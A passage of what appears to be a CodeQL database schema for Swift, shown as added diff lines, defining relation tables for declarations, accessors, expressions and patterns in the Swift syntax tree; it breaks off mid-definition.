+key_path_component_decl_refs( + int id: @key_path_component ref, + int decl_ref: @value_decl_or_none ref +); + +macro_roles( + unique int id: @macro_role, + int kind: int ref, + int macro_syntax: int ref +); + +#keyset[id, index] +macro_role_conformances( + int id: @macro_role ref, + int index: int ref, + int conformance: @type_expr_or_none ref +); + +#keyset[id, index] +macro_role_names( + int id: @macro_role ref, + int index: int ref, + string name: string ref +); + +unspecified_elements( + unique int id: @unspecified_element, + string property: string ref, + string error: string ref +); + +#keyset[id] +unspecified_element_parents( + int id: @unspecified_element ref, + int parent: @element ref +); + +#keyset[id] +unspecified_element_indices( + int id: 
@unspecified_element ref, + int index: int ref +); + +#keyset[id, index] +unspecified_element_children( + int id: @unspecified_element ref, + int index: int ref, + int child: @ast_node_or_none ref +); + +other_availability_specs( + unique int id: @other_availability_spec +); + +platform_version_availability_specs( + unique int id: @platform_version_availability_spec, + string platform: string ref, + string version: string ref +); + +@decl = + @captured_decl +| @enum_case_decl +| @extension_decl +| @if_config_decl +| @import_decl +| @missing_member_decl +| @operator_decl +| @pattern_binding_decl +| @pound_diagnostic_decl +| @precedence_group_decl +| @top_level_code_decl +| @value_decl +; + +#keyset[id] +decls( //dir=decl + int id: @decl ref, + int module: @module_decl_or_none ref +); + +#keyset[id, index] +decl_members( //dir=decl + int id: @decl ref, + int index: int ref, + int member: @decl_or_none ref +); + +@generic_context = + @extension_decl +| @function +| @generic_type_decl +| @macro_decl +| @subscript_decl +; + +#keyset[id, index] +generic_context_generic_type_params( //dir=decl + int id: @generic_context ref, + int index: int ref, + int generic_type_param: @generic_type_param_decl_or_none ref +); + +captured_decls( //dir=decl + unique int id: @captured_decl, + int decl: @value_decl_or_none ref +); + +#keyset[id] +captured_decl_is_direct( //dir=decl + int id: @captured_decl ref +); + +#keyset[id] +captured_decl_is_escaping( //dir=decl + int id: @captured_decl ref +); + +enum_case_decls( //dir=decl + unique int id: @enum_case_decl +); + +#keyset[id, index] +enum_case_decl_elements( //dir=decl + int id: @enum_case_decl ref, + int index: int ref, + int element: @enum_element_decl_or_none ref +); + +extension_decls( //dir=decl + unique int id: @extension_decl, + int extended_type_decl: @nominal_type_decl_or_none ref +); + +#keyset[id, index] +extension_decl_protocols( //dir=decl + int id: @extension_decl ref, + int index: int ref, + int protocol: 
@protocol_decl_or_none ref +); + +if_config_decls( //dir=decl + unique int id: @if_config_decl +); + +#keyset[id, index] +if_config_decl_active_elements( //dir=decl + int id: @if_config_decl ref, + int index: int ref, + int active_element: @ast_node_or_none ref +); + +import_decls( //dir=decl + unique int id: @import_decl +); + +#keyset[id] +import_decl_is_exported( //dir=decl + int id: @import_decl ref +); + +#keyset[id] +import_decl_imported_modules( //dir=decl + int id: @import_decl ref, + int imported_module: @module_decl_or_none ref +); + +#keyset[id, index] +import_decl_declarations( //dir=decl + int id: @import_decl ref, + int index: int ref, + int declaration: @value_decl_or_none ref +); + +missing_member_decls( //dir=decl + unique int id: @missing_member_decl, + string name: string ref +); + +@operator_decl = + @infix_operator_decl +| @postfix_operator_decl +| @prefix_operator_decl +; + +#keyset[id] +operator_decls( //dir=decl + int id: @operator_decl ref, + string name: string ref +); + +pattern_binding_decls( //dir=decl + unique int id: @pattern_binding_decl +); + +#keyset[id, index] +pattern_binding_decl_inits( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int init: @expr_or_none ref +); + +#keyset[id, index] +pattern_binding_decl_patterns( //dir=decl + int id: @pattern_binding_decl ref, + int index: int ref, + int pattern: @pattern_or_none ref +); + +pound_diagnostic_decls( //dir=decl + unique int id: @pound_diagnostic_decl, + int kind: int ref, + int message: @string_literal_expr_or_none ref +); + +precedence_group_decls( //dir=decl + unique int id: @precedence_group_decl +); + +top_level_code_decls( //dir=decl + unique int id: @top_level_code_decl, + int body: @brace_stmt_or_none ref +); + +@value_decl = + @abstract_storage_decl +| @enum_element_decl +| @function +| @macro_decl +| @type_decl +; + +#keyset[id] +value_decls( //dir=decl + int id: @value_decl ref, + int interface_type: @type_or_none ref +); + 
+@abstract_storage_decl = + @subscript_decl +| @var_decl +; + +#keyset[id, index] +abstract_storage_decl_accessors( //dir=decl + int id: @abstract_storage_decl ref, + int index: int ref, + int accessor: @accessor_or_none ref +); + +enum_element_decls( //dir=decl + unique int id: @enum_element_decl, + string name: string ref +); + +#keyset[id, index] +enum_element_decl_params( //dir=decl + int id: @enum_element_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@function = + @accessor_or_named_function +| @deinitializer +| @initializer +; + +infix_operator_decls( //dir=decl + unique int id: @infix_operator_decl +); + +#keyset[id] +infix_operator_decl_precedence_groups( //dir=decl + int id: @infix_operator_decl ref, + int precedence_group: @precedence_group_decl_or_none ref +); + +macro_decls( //dir=decl + unique int id: @macro_decl, + string name: string ref +); + +#keyset[id, index] +macro_decl_parameters( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int parameter: @param_decl_or_none ref +); + +#keyset[id, index] +macro_decl_roles( //dir=decl + int id: @macro_decl ref, + int index: int ref, + int role: @macro_role_or_none ref +); + +postfix_operator_decls( //dir=decl + unique int id: @postfix_operator_decl +); + +prefix_operator_decls( //dir=decl + unique int id: @prefix_operator_decl +); + +@type_decl = + @abstract_type_param_decl +| @generic_type_decl +| @module_decl +; + +#keyset[id] +type_decls( //dir=decl + int id: @type_decl ref, + string name: string ref +); + +#keyset[id, index] +type_decl_inherited_types( //dir=decl + int id: @type_decl ref, + int index: int ref, + int inherited_type: @type_or_none ref +); + +@abstract_type_param_decl = + @associated_type_decl +| @generic_type_param_decl +; + +@accessor_or_named_function = + @accessor +| @named_function +; + +deinitializers( //dir=decl + unique int id: @deinitializer +); + +@generic_type_decl = + @nominal_type_decl +| @opaque_type_decl +| @type_alias_decl +; + 
+initializers( //dir=decl + unique int id: @initializer +); + +module_decls( //dir=decl + unique int id: @module_decl +); + +#keyset[id] +module_decl_is_builtin_module( //dir=decl + int id: @module_decl ref +); + +#keyset[id] +module_decl_is_system_module( //dir=decl + int id: @module_decl ref +); + +module_decl_imported_modules( //dir=decl + int id: @module_decl ref, + int imported_module: @module_decl_or_none ref +); + +module_decl_exported_modules( //dir=decl + int id: @module_decl ref, + int exported_module: @module_decl_or_none ref +); + +subscript_decls( //dir=decl + unique int id: @subscript_decl, + int element_type: @type_or_none ref +); + +#keyset[id, index] +subscript_decl_params( //dir=decl + int id: @subscript_decl ref, + int index: int ref, + int param: @param_decl_or_none ref +); + +@var_decl = + @concrete_var_decl +| @param_decl +; + +#keyset[id] +var_decls( //dir=decl + int id: @var_decl ref, + string name: string ref, + int type_: @type_or_none ref +); + +#keyset[id] +var_decl_attached_property_wrapper_types( //dir=decl + int id: @var_decl ref, + int attached_property_wrapper_type: @type_or_none ref +); + +#keyset[id] +var_decl_parent_patterns( //dir=decl + int id: @var_decl ref, + int parent_pattern: @pattern_or_none ref +); + +#keyset[id] +var_decl_parent_initializers( //dir=decl + int id: @var_decl ref, + int parent_initializer: @expr_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_backing_vars( //dir=decl + int id: @var_decl ref, + int property_wrapper_backing_var: @var_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_var_bindings( //dir=decl + int id: @var_decl ref, + int property_wrapper_projection_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] +var_decl_property_wrapper_projection_vars( //dir=decl + int id: 
@var_decl ref, + int property_wrapper_projection_var: @var_decl_or_none ref +); + +accessors( //dir=decl + unique int id: @accessor +); + +#keyset[id] +accessor_is_getter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_setter( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_will_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_did_set( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_read( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_modify( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_address( //dir=decl + int id: @accessor ref +); + +#keyset[id] +accessor_is_unsafe_mutable_address( //dir=decl + int id: @accessor ref +); + +associated_type_decls( //dir=decl + unique int id: @associated_type_decl +); + +concrete_var_decls( //dir=decl + unique int id: @concrete_var_decl, + int introducer_int: int ref +); + +generic_type_param_decls( //dir=decl + unique int id: @generic_type_param_decl +); + +named_functions( //dir=decl + unique int id: @named_function +); + +@nominal_type_decl = + @class_decl +| @enum_decl +| @protocol_decl +| @struct_decl +; + +#keyset[id] +nominal_type_decls( //dir=decl + int id: @nominal_type_decl ref, + int type_: @type_or_none ref +); + +opaque_type_decls( //dir=decl + unique int id: @opaque_type_decl, + int naming_declaration: @value_decl_or_none ref +); + +#keyset[id, index] +opaque_type_decl_opaque_generic_params( //dir=decl + int id: @opaque_type_decl ref, + int index: int ref, + int opaque_generic_param: @generic_type_param_type_or_none ref +); + +param_decls( //dir=decl + unique int id: @param_decl +); + +#keyset[id] +param_decl_is_inout( //dir=decl + int id: @param_decl ref +); + +#keyset[id] +param_decl_property_wrapper_local_wrapped_var_bindings( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var_binding: @pattern_binding_decl_or_none ref +); + +#keyset[id] 
+param_decl_property_wrapper_local_wrapped_vars( //dir=decl + int id: @param_decl ref, + int property_wrapper_local_wrapped_var: @var_decl_or_none ref +); + +type_alias_decls( //dir=decl + unique int id: @type_alias_decl, + int aliased_type: @type_or_none ref +); + +class_decls( //dir=decl + unique int id: @class_decl +); + +enum_decls( //dir=decl + unique int id: @enum_decl +); + +protocol_decls( //dir=decl + unique int id: @protocol_decl +); + +struct_decls( //dir=decl + unique int id: @struct_decl +); + +arguments( //dir=expr + unique int id: @argument, + string label: string ref, + int expr: @expr_or_none ref +); + +@expr = + @any_try_expr +| @applied_property_wrapper_expr +| @apply_expr +| @assign_expr +| @bind_optional_expr +| @capture_list_expr +| @closure_expr +| @collection_expr +| @consume_expr +| @copy_expr +| @decl_ref_expr +| @default_argument_expr +| @discard_assignment_expr +| @dot_syntax_base_ignored_expr +| @dynamic_type_expr +| @enum_is_case_expr +| @error_expr +| @explicit_cast_expr +| @force_value_expr +| @identity_expr +| @if_expr +| @implicit_conversion_expr +| @in_out_expr +| @key_path_application_expr +| @key_path_dot_expr +| @key_path_expr +| @lazy_initialization_expr +| @literal_expr +| @lookup_expr +| @make_temporarily_escapable_expr +| @materialize_pack_expr +| @obj_c_selector_expr +| @one_way_expr +| @opaque_value_expr +| @open_existential_expr +| @optional_evaluation_expr +| @other_initializer_ref_expr +| @overloaded_decl_ref_expr +| @pack_element_expr +| @pack_expansion_expr +| @property_wrapper_value_placeholder_expr +| @rebind_self_in_initializer_expr +| @sequence_expr +| @single_value_stmt_expr +| @super_ref_expr +| @tap_expr +| @tuple_element_expr +| @tuple_expr +| @type_expr +| @unresolved_decl_ref_expr +| @unresolved_dot_expr +| @unresolved_member_expr +| @unresolved_pattern_expr +| @unresolved_specialize_expr +| @vararg_expansion_expr +; + +#keyset[id] +expr_types( //dir=expr + int id: @expr ref, + int type_: @type_or_none ref 
+); + +@any_try_expr = + @force_try_expr +| @optional_try_expr +| @try_expr +; + +#keyset[id] +any_try_exprs( //dir=expr + int id: @any_try_expr ref, + int sub_expr: @expr_or_none ref +); + +applied_property_wrapper_exprs( //dir=expr + unique int id: @applied_property_wrapper_expr, + int kind: int ref, + int value: @expr_or_none ref, + int param: @param_decl_or_none ref +); + +@apply_expr = + @binary_expr +| @call_expr +| @postfix_unary_expr +| @prefix_unary_expr +| @self_apply_expr +; + +#keyset[id] +apply_exprs( //dir=expr + int id: @apply_expr ref, + int function: @expr_or_none ref +); + +#keyset[id, index] +apply_expr_arguments( //dir=expr + int id: @apply_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +assign_exprs( //dir=expr + unique int id: @assign_expr, + int dest: @expr_or_none ref, + int source: @expr_or_none ref +); + +bind_optional_exprs( //dir=expr + unique int id: @bind_optional_expr, + int sub_expr: @expr_or_none ref +); + +capture_list_exprs( //dir=expr + unique int id: @capture_list_expr, + int closure_body: @closure_expr_or_none ref +); + +#keyset[id, index] +capture_list_expr_binding_decls( //dir=expr + int id: @capture_list_expr ref, + int index: int ref, + int binding_decl: @pattern_binding_decl_or_none ref +); + +@closure_expr = + @auto_closure_expr +| @explicit_closure_expr +; + +@collection_expr = + @array_expr +| @dictionary_expr +; + +consume_exprs( //dir=expr + unique int id: @consume_expr, + int sub_expr: @expr_or_none ref +); + +copy_exprs( //dir=expr + unique int id: @copy_expr, + int sub_expr: @expr_or_none ref +); + +decl_ref_exprs( //dir=expr + unique int id: @decl_ref_expr, + int decl: @decl_or_none ref +); + +#keyset[id, index] +decl_ref_expr_replacement_types( //dir=expr + int id: @decl_ref_expr ref, + int index: int ref, + int replacement_type: @type_or_none ref +); + +#keyset[id] +decl_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] 
+decl_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_ordinary_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +#keyset[id] +decl_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @decl_ref_expr ref +); + +default_argument_exprs( //dir=expr + unique int id: @default_argument_expr, + int param_decl: @param_decl_or_none ref, + int param_index: int ref +); + +#keyset[id] +default_argument_expr_caller_side_defaults( //dir=expr + int id: @default_argument_expr ref, + int caller_side_default: @expr_or_none ref +); + +discard_assignment_exprs( //dir=expr + unique int id: @discard_assignment_expr +); + +dot_syntax_base_ignored_exprs( //dir=expr + unique int id: @dot_syntax_base_ignored_expr, + int qualifier: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +dynamic_type_exprs( //dir=expr + unique int id: @dynamic_type_expr, + int base: @expr_or_none ref +); + +enum_is_case_exprs( //dir=expr + unique int id: @enum_is_case_expr, + int sub_expr: @expr_or_none ref, + int element: @enum_element_decl_or_none ref +); + +error_exprs( //dir=expr + unique int id: @error_expr +); + +@explicit_cast_expr = + @checked_cast_expr +| @coerce_expr +; + +#keyset[id] +explicit_cast_exprs( //dir=expr + int id: @explicit_cast_expr ref, + int sub_expr: @expr_or_none ref +); + +force_value_exprs( //dir=expr + unique int id: @force_value_expr, + int sub_expr: @expr_or_none ref +); + +@identity_expr = + @await_expr +| @borrow_expr +| @dot_self_expr +| @paren_expr +| @unresolved_member_chain_result_expr +; + +#keyset[id] +identity_exprs( //dir=expr + int id: @identity_expr ref, + int sub_expr: @expr_or_none ref +); + +if_exprs( //dir=expr + unique int id: @if_expr, + int condition: @expr_or_none ref, + int then_expr: @expr_or_none ref, + int else_expr: @expr_or_none ref +); + +@implicit_conversion_expr = + @abi_safe_conversion_expr +| @any_hashable_erasure_expr +| @archetype_to_super_expr 
+| @array_to_pointer_expr +| @bridge_from_obj_c_expr +| @bridge_to_obj_c_expr +| @class_metatype_to_object_expr +| @collection_upcast_conversion_expr +| @conditional_bridge_from_obj_c_expr +| @covariant_function_conversion_expr +| @covariant_return_conversion_expr +| @derived_to_base_expr +| @destructure_tuple_expr +| @differentiable_function_expr +| @differentiable_function_extract_original_expr +| @erasure_expr +| @existential_metatype_to_object_expr +| @foreign_object_conversion_expr +| @function_conversion_expr +| @in_out_to_pointer_expr +| @inject_into_optional_expr +| @linear_function_expr +| @linear_function_extract_original_expr +| @linear_to_differentiable_function_expr +| @load_expr +| @metatype_conversion_expr +| @pointer_to_pointer_expr +| @protocol_metatype_to_object_expr +| @string_to_pointer_expr +| @underlying_to_opaque_expr +| @unevaluated_instance_expr +| @unresolved_type_conversion_expr +; + +#keyset[id] +implicit_conversion_exprs( //dir=expr + int id: @implicit_conversion_expr ref, + int sub_expr: @expr_or_none ref +); + +in_out_exprs( //dir=expr + unique int id: @in_out_expr, + int sub_expr: @expr_or_none ref +); + +key_path_application_exprs( //dir=expr + unique int id: @key_path_application_expr, + int base: @expr_or_none ref, + int key_path: @expr_or_none ref +); + +key_path_dot_exprs( //dir=expr + unique int id: @key_path_dot_expr +); + +key_path_exprs( //dir=expr + unique int id: @key_path_expr +); + +#keyset[id] +key_path_expr_roots( //dir=expr + int id: @key_path_expr ref, + int root: @type_repr_or_none ref +); + +#keyset[id, index] +key_path_expr_components( //dir=expr + int id: @key_path_expr ref, + int index: int ref, + int component: @key_path_component_or_none ref +); + +lazy_initialization_exprs( //dir=expr + unique int id: @lazy_initialization_expr, + int sub_expr: @expr_or_none ref +); + +@literal_expr = + @builtin_literal_expr +| @interpolated_string_literal_expr +| @nil_literal_expr +| @object_literal_expr +| 
@regex_literal_expr +; + +@lookup_expr = + @dynamic_lookup_expr +| @member_ref_expr +| @subscript_expr +; + +#keyset[id] +lookup_exprs( //dir=expr + int id: @lookup_expr ref, + int base: @expr_or_none ref +); + +#keyset[id] +lookup_expr_members( //dir=expr + int id: @lookup_expr ref, + int member: @decl_or_none ref +); + +make_temporarily_escapable_exprs( //dir=expr + unique int id: @make_temporarily_escapable_expr, + int escaping_closure: @opaque_value_expr_or_none ref, + int nonescaping_closure: @expr_or_none ref, + int sub_expr: @expr_or_none ref +); + +materialize_pack_exprs( //dir=expr + unique int id: @materialize_pack_expr, + int sub_expr: @expr_or_none ref +); + +obj_c_selector_exprs( //dir=expr + unique int id: @obj_c_selector_expr, + int sub_expr: @expr_or_none ref, + int method: @function_or_none ref +); + +one_way_exprs( //dir=expr + unique int id: @one_way_expr, + int sub_expr: @expr_or_none ref +); + +opaque_value_exprs( //dir=expr + unique int id: @opaque_value_expr +); + +open_existential_exprs( //dir=expr + unique int id: @open_existential_expr, + int sub_expr: @expr_or_none ref, + int existential: @expr_or_none ref, + int opaque_expr: @opaque_value_expr_or_none ref +); + +optional_evaluation_exprs( //dir=expr + unique int id: @optional_evaluation_expr, + int sub_expr: @expr_or_none ref +); + +other_initializer_ref_exprs( //dir=expr + unique int id: @other_initializer_ref_expr, + int initializer: @initializer_or_none ref +); + +overloaded_decl_ref_exprs( //dir=expr + unique int id: @overloaded_decl_ref_expr +); + +#keyset[id, index] +overloaded_decl_ref_expr_possible_declarations( //dir=expr + int id: @overloaded_decl_ref_expr ref, + int index: int ref, + int possible_declaration: @value_decl_or_none ref +); + +pack_element_exprs( //dir=expr + unique int id: @pack_element_expr, + int sub_expr: @expr_or_none ref +); + +pack_expansion_exprs( //dir=expr + unique int id: @pack_expansion_expr, + int pattern_expr: @expr_or_none ref +); + 
+property_wrapper_value_placeholder_exprs( //dir=expr + unique int id: @property_wrapper_value_placeholder_expr, + int placeholder: @opaque_value_expr_or_none ref +); + +#keyset[id] +property_wrapper_value_placeholder_expr_wrapped_values( //dir=expr + int id: @property_wrapper_value_placeholder_expr ref, + int wrapped_value: @expr_or_none ref +); + +rebind_self_in_initializer_exprs( //dir=expr + unique int id: @rebind_self_in_initializer_expr, + int sub_expr: @expr_or_none ref, + int self: @var_decl_or_none ref +); + +sequence_exprs( //dir=expr + unique int id: @sequence_expr +); + +#keyset[id, index] +sequence_expr_elements( //dir=expr + int id: @sequence_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +single_value_stmt_exprs( //dir=expr + unique int id: @single_value_stmt_expr, + int stmt: @stmt_or_none ref +); + +super_ref_exprs( //dir=expr + unique int id: @super_ref_expr, + int self: @var_decl_or_none ref +); + +tap_exprs( //dir=expr + unique int id: @tap_expr, + int body: @brace_stmt_or_none ref, + int var: @var_decl_or_none ref +); + +#keyset[id] +tap_expr_sub_exprs( //dir=expr + int id: @tap_expr ref, + int sub_expr: @expr_or_none ref +); + +tuple_element_exprs( //dir=expr + unique int id: @tuple_element_expr, + int sub_expr: @expr_or_none ref, + int index: int ref +); + +tuple_exprs( //dir=expr + unique int id: @tuple_expr +); + +#keyset[id, index] +tuple_expr_elements( //dir=expr + int id: @tuple_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +type_exprs( //dir=expr + unique int id: @type_expr +); + +#keyset[id] +type_expr_type_reprs( //dir=expr + int id: @type_expr ref, + int type_repr: @type_repr_or_none ref +); + +unresolved_decl_ref_exprs( //dir=expr + unique int id: @unresolved_decl_ref_expr +); + +#keyset[id] +unresolved_decl_ref_expr_names( //dir=expr + int id: @unresolved_decl_ref_expr ref, + string name: string ref +); + +unresolved_dot_exprs( //dir=expr + unique int id: @unresolved_dot_expr, + int 
base: @expr_or_none ref, + string name: string ref +); + +unresolved_member_exprs( //dir=expr + unique int id: @unresolved_member_expr, + string name: string ref +); + +unresolved_pattern_exprs( //dir=expr + unique int id: @unresolved_pattern_expr, + int sub_pattern: @pattern_or_none ref +); + +unresolved_specialize_exprs( //dir=expr + unique int id: @unresolved_specialize_expr, + int sub_expr: @expr_or_none ref +); + +vararg_expansion_exprs( //dir=expr + unique int id: @vararg_expansion_expr, + int sub_expr: @expr_or_none ref +); + +abi_safe_conversion_exprs( //dir=expr + unique int id: @abi_safe_conversion_expr +); + +any_hashable_erasure_exprs( //dir=expr + unique int id: @any_hashable_erasure_expr +); + +archetype_to_super_exprs( //dir=expr + unique int id: @archetype_to_super_expr +); + +array_exprs( //dir=expr + unique int id: @array_expr +); + +#keyset[id, index] +array_expr_elements( //dir=expr + int id: @array_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +array_to_pointer_exprs( //dir=expr + unique int id: @array_to_pointer_expr +); + +auto_closure_exprs( //dir=expr + unique int id: @auto_closure_expr +); + +await_exprs( //dir=expr + unique int id: @await_expr +); + +binary_exprs( //dir=expr + unique int id: @binary_expr +); + +borrow_exprs( //dir=expr + unique int id: @borrow_expr +); + +bridge_from_obj_c_exprs( //dir=expr + unique int id: @bridge_from_obj_c_expr +); + +bridge_to_obj_c_exprs( //dir=expr + unique int id: @bridge_to_obj_c_expr +); + +@builtin_literal_expr = + @boolean_literal_expr +| @magic_identifier_literal_expr +| @number_literal_expr +| @string_literal_expr +; + +call_exprs( //dir=expr + unique int id: @call_expr +); + +@checked_cast_expr = + @conditional_checked_cast_expr +| @forced_checked_cast_expr +| @is_expr +; + +class_metatype_to_object_exprs( //dir=expr + unique int id: @class_metatype_to_object_expr +); + +coerce_exprs( //dir=expr + unique int id: @coerce_expr +); + +collection_upcast_conversion_exprs( 
//dir=expr + unique int id: @collection_upcast_conversion_expr +); + +conditional_bridge_from_obj_c_exprs( //dir=expr + unique int id: @conditional_bridge_from_obj_c_expr +); + +covariant_function_conversion_exprs( //dir=expr + unique int id: @covariant_function_conversion_expr +); + +covariant_return_conversion_exprs( //dir=expr + unique int id: @covariant_return_conversion_expr +); + +derived_to_base_exprs( //dir=expr + unique int id: @derived_to_base_expr +); + +destructure_tuple_exprs( //dir=expr + unique int id: @destructure_tuple_expr +); + +dictionary_exprs( //dir=expr + unique int id: @dictionary_expr +); + +#keyset[id, index] +dictionary_expr_elements( //dir=expr + int id: @dictionary_expr ref, + int index: int ref, + int element: @expr_or_none ref +); + +differentiable_function_exprs( //dir=expr + unique int id: @differentiable_function_expr +); + +differentiable_function_extract_original_exprs( //dir=expr + unique int id: @differentiable_function_extract_original_expr +); + +dot_self_exprs( //dir=expr + unique int id: @dot_self_expr +); + +@dynamic_lookup_expr = + @dynamic_member_ref_expr +| @dynamic_subscript_expr +; + +erasure_exprs( //dir=expr + unique int id: @erasure_expr +); + +existential_metatype_to_object_exprs( //dir=expr + unique int id: @existential_metatype_to_object_expr +); + +explicit_closure_exprs( //dir=expr + unique int id: @explicit_closure_expr +); + +force_try_exprs( //dir=expr + unique int id: @force_try_expr +); + +foreign_object_conversion_exprs( //dir=expr + unique int id: @foreign_object_conversion_expr +); + +function_conversion_exprs( //dir=expr + unique int id: @function_conversion_expr +); + +in_out_to_pointer_exprs( //dir=expr + unique int id: @in_out_to_pointer_expr +); + +inject_into_optional_exprs( //dir=expr + unique int id: @inject_into_optional_expr +); + +interpolated_string_literal_exprs( //dir=expr + unique int id: @interpolated_string_literal_expr +); + +#keyset[id] 
+interpolated_string_literal_expr_interpolation_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int interpolation_expr: @opaque_value_expr_or_none ref +); + +#keyset[id] +interpolated_string_literal_expr_appending_exprs( //dir=expr + int id: @interpolated_string_literal_expr ref, + int appending_expr: @tap_expr_or_none ref +); + +linear_function_exprs( //dir=expr + unique int id: @linear_function_expr +); + +linear_function_extract_original_exprs( //dir=expr + unique int id: @linear_function_extract_original_expr +); + +linear_to_differentiable_function_exprs( //dir=expr + unique int id: @linear_to_differentiable_function_expr +); + +load_exprs( //dir=expr + unique int id: @load_expr +); + +member_ref_exprs( //dir=expr + unique int id: @member_ref_expr +); + +#keyset[id] +member_ref_expr_has_direct_to_storage_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_ordinary_semantics( //dir=expr + int id: @member_ref_expr ref +); + +#keyset[id] +member_ref_expr_has_distributed_thunk_semantics( //dir=expr + int id: @member_ref_expr ref +); + +metatype_conversion_exprs( //dir=expr + unique int id: @metatype_conversion_expr +); + +nil_literal_exprs( //dir=expr + unique int id: @nil_literal_expr +); + +object_literal_exprs( //dir=expr + unique int id: @object_literal_expr, + int kind: int ref +); + +#keyset[id, index] +object_literal_expr_arguments( //dir=expr + int id: @object_literal_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +optional_try_exprs( //dir=expr + unique int id: @optional_try_expr +); + +paren_exprs( //dir=expr + unique int id: @paren_expr +); + +pointer_to_pointer_exprs( //dir=expr + unique int id: @pointer_to_pointer_expr +); + +postfix_unary_exprs( //dir=expr + unique int id: @postfix_unary_expr +); + +prefix_unary_exprs( //dir=expr + unique int 
id: @prefix_unary_expr +); + +protocol_metatype_to_object_exprs( //dir=expr + unique int id: @protocol_metatype_to_object_expr +); + +regex_literal_exprs( //dir=expr + unique int id: @regex_literal_expr, + string pattern: string ref, + int version: int ref +); + +@self_apply_expr = + @dot_syntax_call_expr +| @initializer_ref_call_expr +; + +#keyset[id] +self_apply_exprs( //dir=expr + int id: @self_apply_expr ref, + int base: @expr_or_none ref +); + +string_to_pointer_exprs( //dir=expr + unique int id: @string_to_pointer_expr +); + +subscript_exprs( //dir=expr + unique int id: @subscript_expr +); + +#keyset[id, index] +subscript_expr_arguments( //dir=expr + int id: @subscript_expr ref, + int index: int ref, + int argument: @argument_or_none ref +); + +#keyset[id] +subscript_expr_has_direct_to_storage_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_direct_to_implementation_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_ordinary_semantics( //dir=expr + int id: @subscript_expr ref +); + +#keyset[id] +subscript_expr_has_distributed_thunk_semantics( //dir=expr + int id: @subscript_expr ref +); + +try_exprs( //dir=expr + unique int id: @try_expr +); + +underlying_to_opaque_exprs( //dir=expr + unique int id: @underlying_to_opaque_expr +); + +unevaluated_instance_exprs( //dir=expr + unique int id: @unevaluated_instance_expr +); + +unresolved_member_chain_result_exprs( //dir=expr + unique int id: @unresolved_member_chain_result_expr +); + +unresolved_type_conversion_exprs( //dir=expr + unique int id: @unresolved_type_conversion_expr +); + +boolean_literal_exprs( //dir=expr + unique int id: @boolean_literal_expr, + boolean value: boolean ref +); + +conditional_checked_cast_exprs( //dir=expr + unique int id: @conditional_checked_cast_expr +); + +dot_syntax_call_exprs( //dir=expr + unique int id: @dot_syntax_call_expr +); + +dynamic_member_ref_exprs( //dir=expr + unique int id: 
@dynamic_member_ref_expr +); + +dynamic_subscript_exprs( //dir=expr + unique int id: @dynamic_subscript_expr +); + +forced_checked_cast_exprs( //dir=expr + unique int id: @forced_checked_cast_expr +); + +initializer_ref_call_exprs( //dir=expr + unique int id: @initializer_ref_call_expr +); + +is_exprs( //dir=expr + unique int id: @is_expr +); + +magic_identifier_literal_exprs( //dir=expr + unique int id: @magic_identifier_literal_expr, + string kind: string ref +); + +@number_literal_expr = + @float_literal_expr +| @integer_literal_expr +; + +string_literal_exprs( //dir=expr + unique int id: @string_literal_expr, + string value: string ref +); + +float_literal_exprs( //dir=expr + unique int id: @float_literal_expr, + string string_value: string ref +); + +integer_literal_exprs( //dir=expr + unique int id: @integer_literal_expr, + string string_value: string ref +); + +@pattern = + @any_pattern +| @binding_pattern +| @bool_pattern +| @enum_element_pattern +| @expr_pattern +| @is_pattern +| @named_pattern +| @optional_some_pattern +| @paren_pattern +| @tuple_pattern +| @typed_pattern +; + +#keyset[id] +pattern_types( //dir=pattern + int id: @pattern ref, + int type_: @type_or_none ref +); + +any_patterns( //dir=pattern + unique int id: @any_pattern +); + +binding_patterns( //dir=pattern + unique int id: @binding_pattern, + int sub_pattern: @pattern_or_none ref +); + +bool_patterns( //dir=pattern + unique int id: @bool_pattern, + boolean value: boolean ref +); + +enum_element_patterns( //dir=pattern + unique int id: @enum_element_pattern, + int element: @enum_element_decl_or_none ref +); + +#keyset[id] +enum_element_pattern_sub_patterns( //dir=pattern + int id: @enum_element_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +expr_patterns( //dir=pattern + unique int id: @expr_pattern, + int sub_expr: @expr_or_none ref +); + +is_patterns( //dir=pattern + unique int id: @is_pattern +); + +#keyset[id] +is_pattern_cast_type_reprs( //dir=pattern + int id: 
